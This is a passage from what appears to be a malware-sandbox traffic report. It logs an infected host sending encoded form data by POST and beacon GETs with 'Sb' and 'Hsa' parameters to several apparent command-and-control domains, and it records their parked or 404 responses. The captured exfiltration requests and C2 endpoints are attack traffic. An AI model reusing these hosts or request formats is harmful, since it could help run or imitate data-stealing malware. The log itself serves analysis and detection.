                                                                                        Data Ascii: Sb=V1YNf/sbC7SGr9qv2gNF1mo9m7YNOjI6jrMvrh4ULbAS+CqVp0BckS4nrDuFeuIxAbzDZFqTaHN3lwhqqm+ZPsaxLd8lLDS9oVgMHpVB2+B7Fv2tYF9mvEUwTnB2bAKYchDuuxGC2nYLT1h+h3H/fWMr58H1LWWva8z3Ip+f+s1yJRqTukP1r7gPUGAwJ6l12RW57bZtjrfcEwwNEZDmp1Y=
                                                                                        Dec 12, 2024 21:58:27.255738020 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:58:26 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1150
                                                                                        x-request-id: 103ede2e-49f5-4c34-914a-2e7941c9519c
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_klGU9lrLfTCCLAGoBauEjjyvOpPuvZQJ3WXWgHk71rK8wYRPLz5wvOTaVT+W+FYbK6I7pdXg5EzmR6cii9sfIw==
                                                                                        set-cookie: parking_session=103ede2e-49f5-4c34-914a-2e7941c9519c; expires=Thu, 12 Dec 2024 21:13:27 GMT; path=/
                                                                                        connection: close
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_klGU9lrLfTCCLAGoBauEjjyvOpPuvZQJ3WXWgHk71rK8wYRPLz5wvOTaVT+W+FYbK6I7pdXg5EzmR6cii9sfIw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:58:27.256031036 CET | 550 | IN
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTAzZWRlMmUtNDlmNS00YzM0LTkxNGEtMmU3OTQxYzk1MTljIiwicGFnZV90aW1lIjoxNzM0MDM3MTA3LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cudmF2YWRhLW9mZmljaWF


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        64 | 192.168.11.20 | 49779 | 199.59.243.227 | 80
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:58:29.765141964 CET | 2578 | OUT | POST /emhd/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.vavada-official.buzz
                                                                                        Origin: http://www.vavada-official.buzz
                                                                                        Referer: http://www.vavada-official.buzz/emhd/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:58:29.765193939 CET | 5259 | OUT
                                                                                        Data Ascii: FVgHNF6y3vXmMOsv8C9D2aI0YOYtPrGFBRg/Hku9E6nDHSJCbaX1PhBiwKbgG1npouB0SdVUyizqjEpdzgPU/BpJd1V7ofrD6a8Yrz8pOklgpHc2qTgqlc+ZwFjCvStaA7+jS8onojXuHry3MIwFG1W2vK1A7n9N09qxMQM5mSRwrBq9Hf9LAzxP0tDQS5fmLuq+SI3gCV3f/27tdQuNA9s0QPcsLMYQ1CkdWz8e913fXazrDs+
                                                                                        Dec 12, 2024 21:58:29.896634102 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:58:28 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1150
                                                                                        x-request-id: 722d4ad1-1042-4034-b96d-60c607a0734b
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_klGU9lrLfTCCLAGoBauEjjyvOpPuvZQJ3WXWgHk71rK8wYRPLz5wvOTaVT+W+FYbK6I7pdXg5EzmR6cii9sfIw==
                                                                                        set-cookie: parking_session=722d4ad1-1042-4034-b96d-60c607a0734b; expires=Thu, 12 Dec 2024 21:13:29 GMT; path=/
                                                                                        connection: close
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_klGU9lrLfTCCLAGoBauEjjyvOpPuvZQJ3WXWgHk71rK8wYRPLz5wvOTaVT+W+FYbK6I7pdXg5EzmR6cii9sfIw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:58:29.896645069 CET | 550 | IN
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzIyZDRhZDEtMTA0Mi00MDM0LWI5NmQtNjBjNjA3YTA3MzRiIiwicGFnZV90aW1lIjoxNzM0MDM3MTA5LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cudmF2YWRhLW9mZmljaWF


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        65 | 192.168.11.20 | 49780 | 199.59.243.227 | 80
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:58:32.421183109 CET | 390 | OUT | GET /emhd/?Sb=Y3wtcJEoAby1p+bk3zYE+S80u8VCADM8sIJ2uwsESb9JsS+UnBQfnVhf+jS3LtVrLL+QWmPwAmdepwRhozi7BsCDIfZRcDeIjksRC4QWquR1OPmKeFcOon4=&Hsa=KVXAK1dJ22EyzD HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.vavada-official.buzz
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:58:32.553239107 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:58:31 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1478
                                                                                        x-request-id: 522c8a56-7bd6-417d-a0b2-16af8e63ee32
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AZ3uLNt9rXbHW0k6PV5JZ5ETb/dISEcST+qM0Nb9IvznlWozOGfpnoLGqsLQNydLCyQPmGdupJhd0hB2GASR2Q==
                                                                                        set-cookie: parking_session=522c8a56-7bd6-417d-a0b2-16af8e63ee32; expires=Thu, 12 Dec 2024 21:13:32 GMT; path=/
                                                                                        connection: close
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AZ3uLNt9rXbHW0k6PV5JZ5ETb/dISEcST+qM0Nb9IvznlWozOGfpnoLGqsLQNydLCyQPmGdupJhd0hB2GASR2Q==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:58:32.553251982 CET | 878 | IN
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTIyYzhhNTYtN2JkNi00MTdkLWEwYjItMTZhZjhlNjNlZTMyIiwicGFnZV90aW1lIjoxNzM0MDM3MTEyLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cudmF2YWRhLW9mZmljaWF


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        66 | 192.168.11.20 | 49781 | 172.67.131.144 | 80
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:58:37.686052084 CET | 644 | OUT | POST /1lpi/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.jyshe18.buzz
                                                                                        Origin: http://www.jyshe18.buzz
                                                                                        Referer: http://www.jyshe18.buzz/1lpi/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=aMSFOt46gPEmL33FcwbIy3Vt0Gy472y7TvDFvQJanHZoAwECCrF1WiluoiV7u+kmojXz5uXBsrTsIlUwDmi+2nx3iQ7aO6nXO6gJGDn7xttUbNGP00UDOB0GjRs8JEb2QDwTgPd+2q2Pibq/8X/WsuFEPfW3Q+cMJVbTlA/gvyvdU0Seluuys9NRabrnOyMhrA==
                                                                                        Dec 12, 2024 21:58:37.998291016 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:58:37 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AXHEKA1dPN3EQEVTjcac%2Bg%2BBetujXOLh3AFwT0PWbgmAo0eqzHKnRP9wBcPNV1IWwbnSand4F1IgHf1Zp312WjzJgPnvOUh26Lmh0g9ago2HO2pOr92MBTxW4vM51PitNhH5"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f10a231ebfdb0cf-ATL
                                                                                        Content-Encoding: gzip
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=114529&min_rtt=114529&rtt_var=57264&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=644&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Dec 12, 2024 21:58:37.998305082 CET | 162 | IN
                                                                                        Dec 12, 2024 21:58:37.998315096 CET | 15 | IN | Data Raw: 61 0d 0a 03 00 b7 30 52 23 cb 05 00 00 0d 0a
                                                                                        Data Ascii: a0R#
                                                                                        Dec 12, 2024 21:58:37.998323917 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        67 | 192.168.11.20 | 49782 | 172.67.131.144 | 80
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:58:40.322887897 CET | 664 | OUT | POST /1lpi/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.jyshe18.buzz
                                                                                        Origin: http://www.jyshe18.buzz
                                                                                        Referer: http://www.jyshe18.buzz/1lpi/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=aMSFOt46gPEmITzFbXPI0XVuxGy4imy3TvPFvR9KmyJoBUUCDp91fylu9SV+helqojbR5vrBsr3sIlEwDR2533x1pw7EQKnXO6gJGDjBxtFUa+eP1VUCQx0F0hs8eUbyQDwhgNol2o+PiZy/8jrV7+FGMvXOZNNSMn7upjXJ1CvWRifE4caWvuRjerSPMwN62OTmwLZWD7DNWJJTBR6iAZU=
                                                                                        Dec 12, 2024 21:58:40.638175011 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:58:40 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rWyklwtTKzJeSATVvAr8be2jmCSNT7QKNIvkJ8jMC%2BwyUmMbhQa7jT0uQUPp21%2FZ3CXnAsL7idT7CbEpwC9n8fTye2NJGsOiLEYoxP4mjoSiIEU8KJ6VIg%2BotUWUTNVO%2BIcg"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f10a2426a9d6747-ATL
                                                                                        Content-Encoding: gzip
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=113978&min_rtt=113978&rtt_var=56989&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=664&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Dec 12, 2024 21:58:40.638190985 CET  176  IN
Dec 12, 2024 21:58:40.638210058 CET  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port
68  192.168.11.20  49783  172.67.131.144  80
Timestamp  Bytes transferred  Direction  Data
Dec 12, 2024 21:58:42.963151932 CET  2578  OUT  POST /1lpi/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.jyshe18.buzz
                                                                                        Origin: http://www.jyshe18.buzz
                                                                                        Referer: http://www.jyshe18.buzz/1lpi/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
Dec 12, 2024 21:58:42.963211060 CET  5235  OUT
Dec 12, 2024 21:58:43.294539928 CET  1289  IN  HTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:58:43 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fPFmB9TyUHDvEO3SsOWw2MxH17SLqb9DQSlrhW78cCYwmTtGhRbeiayXshP38wSwyYJb9a7kPsJiHqj4sCatiDgyUNPABMrIRTeTrL9ddtZr7xTLLqOlU%2BqVW4d8b%2Fb%2BZYLu"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f10a252ed3bbfa0-ATL
                                                                                        Content-Encoding: gzip
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=114262&min_rtt=114262&rtt_var=57131&sent=5&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7813&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Dec 12, 2024 21:58:43.294559956 CET  175  IN
Dec 12, 2024 21:58:43.294565916 CET  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port
69  192.168.11.20  49784  172.67.131.144  80
Timestamp  Bytes transferred  Direction  Data
Dec 12, 2024 21:58:45.603945017 CET  382  OUT  GET /1lpi/?Hsa=KVXAK1dJ22EyzD&Sb=XO6lNaUCtrQGcU2USTPm7AFH+ym41S/sd9ytkxpugSckEiM1CKodZjEVrjBa4PsrlwO68eKRpavYImQlE0qw0gJ/mieYbLr4KLMXJAig3t9gV+Ck/1h1VB8= HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.jyshe18.buzz
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
Dec 12, 2024 21:58:45.912182093 CET  1289  IN  HTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:58:45 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vskf4lkCHeII0L%2B2FQp4QBUzM9ZlPEIp%2BfLNuJt%2FIiAxjKtjkUTY7kpqvSaFYNmfUcuUX74z4EDJ7K%2BOk74FhN6SK3JnqlLOKt9Dq6I%2BsG4gOk0Ihxkc%2B3sDp4eq2O%2Bq%2Fg7Q"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f10a2636a2553da-ATL
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=114177&min_rtt=114177&rtt_var=57088&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=382&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Data Ascii: 5cb<script type="text/javascript"> gowechat(); function gowechat() { var ua = navigator.userAgent; var isWeixin = ua.indexOf('MicroMessenger') > -1; // if (isWeixin) {window.location.href = 'https://site.ip138.com/www.jyshe18.buzz'; // } }</script><script type="text/javascript"> goqqllq(); function goqqllq() { var ua = navigator.userAgent; var isqqllq = ua.indexOf('QQ
Dec 12, 2024 21:58:45.912190914 CET  1021  IN
                                                                                        Data Ascii: Browser') > -1; // QQ if (isqqllq) {window.location.href = 'http://site.ip138.com/www.jyshe18.buzz'; // QQ } }</script><script type="text/javascript"> goquark(); function goquark() { var
Dec 12, 2024 21:58:45.912195921 CET  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port
70  192.168.11.20  49785  103.106.67.112  80
Timestamp  Bytes transferred  Direction  Data
Dec 12, 2024 21:58:51.087069035 CET  644  OUT  POST /86f0/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.furrcali.xyz
                                                                                        Origin: http://www.furrcali.xyz
                                                                                        Referer: http://www.furrcali.xyz/86f0/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
Dec 12, 2024 21:58:51.246778011 CET  204  IN  HTTP/1.1 404 Not Found
                                                                                        Server: Dynamic Http Server
                                                                                        X-Ratelimit-Limit: 101
                                                                                        X-Ratelimit-Remaining: 100
                                                                                        X-Ratelimit-Reset: 1
                                                                                        Date: Thu, 12 Dec 2024 20:58:51 GMT
                                                                                        Content-Length: 0
                                                                                        Connection: close


Session ID  Source IP  Source Port  Destination IP  Destination Port
71  192.168.11.20  49786  103.106.67.112  80
Timestamp  Bytes transferred  Direction  Data
Dec 12, 2024 21:58:53.774487972 CET  664  OUT  POST /86f0/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.furrcali.xyz
                                                                                        Origin: http://www.furrcali.xyz
                                                                                        Referer: http://www.furrcali.xyz/86f0/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
Dec 12, 2024 21:58:53.934149027 CET  204  IN  HTTP/1.1 404 Not Found
                                                                                        Server: Dynamic Http Server
                                                                                        X-Ratelimit-Limit: 101
                                                                                        X-Ratelimit-Remaining: 100
                                                                                        X-Ratelimit-Reset: 1
                                                                                        Date: Thu, 12 Dec 2024 20:58:53 GMT
                                                                                        Content-Length: 0
                                                                                        Connection: close


Session ID  Source IP  Source Port  Destination IP  Destination Port
72  192.168.11.20  49787  103.106.67.112  80
Timestamp  Bytes transferred  Direction  Data
Dec 12, 2024 21:58:56.462896109 CET  1289  OUT  POST /86f0/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.furrcali.xyz
                                                                                        Origin: http://www.furrcali.xyz
                                                                                        Referer: http://www.furrcali.xyz/86f0/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
Dec 12, 2024 21:58:56.462955952 CET  6524  OUT
Dec 12, 2024 21:58:56.624205112 CET  204  IN  HTTP/1.1 404 Not Found
                                                                                        Server: Dynamic Http Server
                                                                                        X-Ratelimit-Limit: 101
                                                                                        X-Ratelimit-Remaining: 100
                                                                                        X-Ratelimit-Reset: 1
                                                                                        Date: Thu, 12 Dec 2024 20:58:56 GMT
                                                                                        Content-Length: 0
                                                                                        Connection: close


Session ID  Source IP  Source Port  Destination IP  Destination Port
73  192.168.11.20  49788  103.106.67.112  80
Timestamp  Bytes transferred  Direction  Data
Dec 12, 2024 21:58:59.143593073 CET  382  OUT  GET /86f0/?Sb=PuKikXorY4oo6Pd4yxwUW5NofTFUIXhFjDlOX4M2s/L5J9SfDLPGQlnn7RwJ6yyFAuMFatCqAdXGLq9bXHIsbHEK0zn8CXVXTea1ExwfCjX9qoJAsvLL/QI=&Hsa=KVXAK1dJ22EyzD HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.furrcali.xyz
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
Dec 12, 2024 21:58:59.303318024 CET  204  IN  HTTP/1.1 404 Not Found
                                                                                        Server: Dynamic Http Server
                                                                                        X-Ratelimit-Limit: 101
                                                                                        X-Ratelimit-Remaining: 100
                                                                                        X-Ratelimit-Reset: 1
                                                                                        Date: Thu, 12 Dec 2024 20:58:59 GMT
                                                                                        Content-Length: 0
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        74 | 192.168.11.20 | 49789 | 199.59.243.227 | 80
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:59:04.448617935 CET | 656 | OUT | POST /f9au/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.activeusers.tech
                                                                                        Origin: http://www.activeusers.tech
                                                                                        Referer: http://www.activeusers.tech/f9au/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=dTFvZ2VPnYiRoXcwxVCakJsiseYWGGk/p32CxtqxUe30VYBl9csu9rFPYrwfL7FJL091zQ4jjL6oxEX6qk1jgit9QjY3bBj7lVVli/8TwjdDWwh/MKdVfgNjAaMk8EV5RhfcbfSzbgauvWnakg9HMq1s1QSmqoqt+v8X8r/N0C14hhkYSeDFhaClsl4bf89SoQ==
                                                                                        Dec 12, 2024 21:59:04.580002069 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:59:03 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1134
                                                                                        x-request-id: 11a9c837-b12d-4e4d-9b6f-03c6cf3d9d84
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_R/fR5qQWR1xDptT+DmYSSYR/2VJQ+VUI2409f40OoSTAAe3fXzVlaIhXcxlVus7LuSE9VVwXJuXSYnMM5AVaaw==
                                                                                        set-cookie: parking_session=11a9c837-b12d-4e4d-9b6f-03c6cf3d9d84; expires=Thu, 12 Dec 2024 21:14:04 GMT; path=/
                                                                                        connection: close
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_R/fR5qQWR1xDptT+DmYSSYR/2VJQ+VUI2409f40OoSTAAe3fXzVlaIhXcxlVus7LuSE9VVwXJuXSYnMM5AVaaw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:59:04.580018044 CET | 534 | IN
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTFhOWM4MzctYjEyZC00ZTRkLTliNmYtMDNjNmNmM2Q5ZDg0IiwicGFnZV90aW1lIjoxNzM0MDM3MTQ0LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuYWN0aXZldXNlcnMudGV


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        75 | 192.168.11.20 | 49790 | 199.59.243.227 | 80
